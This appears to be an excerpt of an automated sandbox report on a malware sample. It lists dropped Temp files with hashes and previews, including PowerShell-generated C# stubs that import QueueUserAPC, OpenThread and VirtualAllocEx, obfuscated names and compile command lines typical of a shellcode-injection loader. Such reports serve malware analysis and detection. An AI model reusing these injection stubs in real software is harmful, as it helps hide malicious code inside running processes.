                                                          SHA-512:B41A0E9BA8A092E134E9403EA3C1B080B8F2D1030CE14AFA2647B282F66A76C48A4419D5D0F7C3C78412A427F4B84B8B48349B76FF2C3FD1DA9EC80D2AB14A6B
                                                          Malicious:false
                                                          Preview: -------- ..
                                                          C:\Users\user\AppData\Local\Temp\RES20A.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.707958824120458
                                                          Encrypted:false
                                                          SSDEEP:24:p+fpt6nfHuhKdNfI+ycuZhNbWakSyHPNnq9qp0e9Ep:cOfkKd91ulqa3+q9H
                                                          MD5:9F22A8320D7A071B76FDC69EC539ECCB
                                                          SHA1:14333BA5399DAD87A67A7C9A7AFEB8740FCFEECE
                                                          SHA-256:9394AC09F500EBF590CEF7AA960C5BA829D34107A3156FD9258CB42DB78240DB
                                                          SHA-512:615184C6FB055548483C213F1B47960804AED79DC425C4387446B496D2C6948196D17408F2013694B44711163F2881F878BBAAF2AE292EDDD0BFF10711287AC9
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP..................<..)..,7@G.Z...........3.......C:\Users\user\AppData\Local\Temp\RES20A.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RES47B.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.7147512751024414
                                                          Encrypted:false
                                                          SSDEEP:24:p+fqnfHuhKdNfI+ycuZhNRakSfPNnq9qpxe9Ep:cqfkKd91ulRa39q9e
                                                          MD5:56C427E4F156501570F09F60C71B4FFC
                                                          SHA1:E95259B5A9D2A7D6985794796C7D50E44F2ED54E
                                                          SHA-256:0DF94A4553794E9745768309E3143BF27364A91D236F4B7B3078172745404A9D
                                                          SHA-512:4DF6DE36B39C6AE6F8ECD8ACC31EEB1659FB4C75981086D5BD9D89560F7D7EAE4EE946E0E07BEC9F8095F15BA16CAB2679D500EB40C959B0452B3482FCBA76F8
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP........................x.7.............3.......C:\Users\user\AppData\Local\Temp\RES47B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESF604.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.704757091617058
                                                          Encrypted:false
                                                          SSDEEP:24:bZfF7LDfHvV0QhKdNNI+ycuZhNkqakS1bPNnq9qp1e9Ep:bBptdKd31ul3a37q9a
                                                          MD5:A19900A27924406D8B8C2B3967F7549E
                                                          SHA1:67086C00C8F2AD154A30F03F3B7B7FCC5CCA26AB
                                                          SHA-256:B10D3F322BEEB34F99285BE39628DEB06F88269B1C71D5AB201C1D4C873107B6
                                                          SHA-512:B24F2FA68DDBDDB024C3439363F240E98390EEC262BF791B83F9E032429B41F9610641EAD8BE66589E698765AE895B07D4CAD7324583854FBD7F363B7AB41818
                                                          Malicious:false
                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP................|VQh..|.8.r...............4.......C:\Users\user\AppData\Local\Temp\RESF604.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESF652.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.702279321283148
                                                          Encrypted:false
                                                          SSDEEP:24:p+fiijCDfHv6hKdNNI+ycuZhNxakSPPNnq9qp1e9Ep:ct44Kd31ulxa3Nq9a
                                                          MD5:68F64E91D72B2B0F972BCD7336F2A9CC
                                                          SHA1:2B4DA3BF145E15313E6796912E46193EC0CB0542
                                                          SHA-256:5AEBE77361A5E69CD2F4E5A7FD83CE17FEEFEFBC6C29E429A92471903DE78A00
                                                          SHA-512:7D6DD472E15D32B947CD7C7CC98073D00E05FAD1397E0B5BF4A00280DD0C9729F1B9783E8713C429AD221C12C1C76867E6EED624A266467D2C180868C97CF8A2
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP................N0........].=............4.......C:\Users\user\AppData\Local\Temp\RESF652.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1khnqhjk.loo.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psahr3sw.wpu.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tg4p345c.j2l.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1118070987658872
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuqak7Ynqq1bPN5Dlq5J:+RI+ycuZhNkqakS1bPNnqX
                                                          MD5:7C5651680CDC7C8F38DD72F6EFF7FCC1
                                                          SHA1:48F3B58D5CF23B80248D1220D2781699720AB0FC
                                                          SHA-256:5E443A37A5A1A69715E0C8D1C58A98CB0CEDAB7B9F9CF4F043FC43A37F4A2155
                                                          SHA-512:009D6016851CEC3F44A2664E385461C377E9179517BB89707B0C47093C358D583FD0E08367FF693CDC6B6B84DFF7F2E7D4DEBB4BAFB1003228945811C467985A
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.5.2.a.c.u.f.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.5.2.a.c.u.f.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.249748564356388
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftqhzxs7+AEszIwkn23ftqq9:p37Lvkmb6KRfFqhWZEifFqq9
                                                          MD5:1F903E4C6488F96BEFF8106212BB1FB8
                                                          SHA1:F83BA87CDA88445647CBC5287FEB88FB745303D9
                                                          SHA-256:9AE5B2762E43566A26D39530831229138A3DE4407243A22BF1CACA6DDC8C5EC1
                                                          SHA-512:72685413AF01FC6EFF547B0E3F7A18A2F3FA655FCF33566E7EA1368A9684DB674AFACD57FC30F1D010B54C0D1991A1CE1A079A0CBB84ADB231546E382457E871
                                                          Malicious:true
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.597551467700443
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpi94MatkZfltUaUI+ycuZhNkqakS1bPNnq:6XDWb5lxF1hJl61ul3a37q
                                                          MD5:C46F8C61C8CB705DF757CCCA39C5B679
                                                          SHA1:AF738C88BB2A7C2CF9D18F0A68179DCE724C13D7
                                                          SHA-256:DD862D783A4E8A31034B21655E7F80366CF2A745E821AB0E4D7EB0DD2749D3E2
                                                          SHA-512:9938809F33099A04070BC942239CF9C48B2F99CD2E7D77851939AEB1FA9A5DF6DCA46F7FF584E4183BC7ACEB2BFB7C88B3747ACE7ABC5A9481DA678590D01F9E
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.a52acufz.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0863679805822777
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBVak7Ynqq4aPN5Dlq5J:+RI+ycuZhNxakSPPNnqX
                                                          MD5:A84E3090E4FC8017918EF55DA63D009A
                                                          SHA1:E15976679755FDC7CC21F13701703C98E72E7187
                                                          SHA-256:6CD9F5821875D9A6795771EEC4553888DCAEED39D713D8AAFD886594B22CDAC3
                                                          SHA-512:0BCECD1BFFAA5F7AAF3C1A402AAFF92770676B19B91A2EF3F785FB58F2993B9BAC01A55B3E39AEF19B43928ED008D1C468A0518CAD499E2E3C24AE14128E28AE
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.22823213171567
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fx1CokCLGzxs7+AEszIwkn23fx1CokC:p37Lvkmb6KRfZ1jkHWZEifZ1jkC
                                                          MD5:FA407420BBC7FCEC54DFA5F57B2D7BFB
                                                          SHA1:5964FDCA13AB3C97EE75C4D5D15DEA6ED75A6FDC
                                                          SHA-256:E30540BE2C4911E47BBDF06B9F3DB165CD98DD7A4D77D028767C546DC3B50342
                                                          SHA-512:DE73CCC9D3540D976AA4E27DCA7ABA5D44DC8ABBA0810229DF904B1C52D51EA84AE908487E61E4C5E29B78546634DC52BBFFE3CE15052611093048A77A896307
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.590972462431772
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpiea4MatkZf28zaUI+ycuZhNxakSPPNnq:6XDWb5lxF11JVr1ulxa3Nq
                                                          MD5:2C829AD936178D4534050E2CF39B3F90
                                                          SHA1:5096E288CE9F5699BB3BB57930ED2B749692CA5B
                                                          SHA-256:E7ACFB204936BB5A36A6E11EC33A50BE09C01CF0104A556C03247B227F590B37
                                                          SHA-512:CD552B4F18D42DAB7B5E63FAE29715C3518CC9B26FB7DD08D12FFD1416585E734E650F8E5228C3E6F0115FC9A84BCE3ED9136A79CC2C2FBA204DF9E5B572EC0D
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.aixojixg.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1040997079419537
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRWak7YnqqyHPN5Dlq5J:+RI+ycuZhNbWakSyHPNnqX
                                                          MD5:9907C63C948829AE092C374047EE5A7F
                                                          SHA1:16272A7ED54545B9C5EB9DB21BAF114DBBEBA3F6
                                                          SHA-256:67EDC019440BEAB697297DA6152E19A52C0FE9B6E19A60C6CE235A60C7ECC9A4
                                                          SHA-512:B4D72964DF5A8CFC8CFAA248BD4F05F6C578EF47CEBFBD240AE15E3123088CE88CFFD212265D836A2B3EB6784762CDBDA5AEE08C13FC77F38C3807E61C6EAF16
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.260808918395778
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fpvJUzxs7+AEszIwkn23fpF9:p37Lvkmb6KRfhv+WZEifhr
                                                          MD5:0330280B07D13A01DEC77E2EDC601878
                                                          SHA1:D0F5CBC44E5B7DDD673F51164A68DE0C47E7EC74
                                                          SHA-256:A6904C47757F5AC51C966E7BC9D0BC5B6EB9F09C53FC843CD3B28ACF44DA2F37
                                                          SHA-512:6E6B2A6F74845D5207AA9D57558E701B842392CB1D89B02ECAFEACAB746C22054E9A92F7AB9D7A5B8C9A7C7764CEB054F6CA17AF7DE9A6A54C8F28C0110EEB87
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6445805370692286
                                                          Encrypted:false
                                                          SSDEEP:24:etGSi/WMOWEey8MTz7X8daP0eWQyaDdWSWtJ0DtkZfgB/7XI+ycuZhNbWakSyHPE:6i/A7KMTcd6qZkWPVJgh1ulqa3+q
                                                          MD5:A4133BB77D49BF5FE87ABE8507B3EBD7
                                                          SHA1:1871D83D9E0E0850DF8F2146693135C4F7770EE5
                                                          SHA-256:365D9862EAB5F5F08A5926E86058C33BE06692E309FD3D5F53085BF7636CD97F
                                                          SHA-512:17EDADBCD3E5AE487E6652567B5A046AD4955084458B5951A9C365C9BC43E43A7EF67D5109F4E4319A98695CF30FF18046F8796F3042BC82D30605BF209FA36C
                                                          Malicious:false
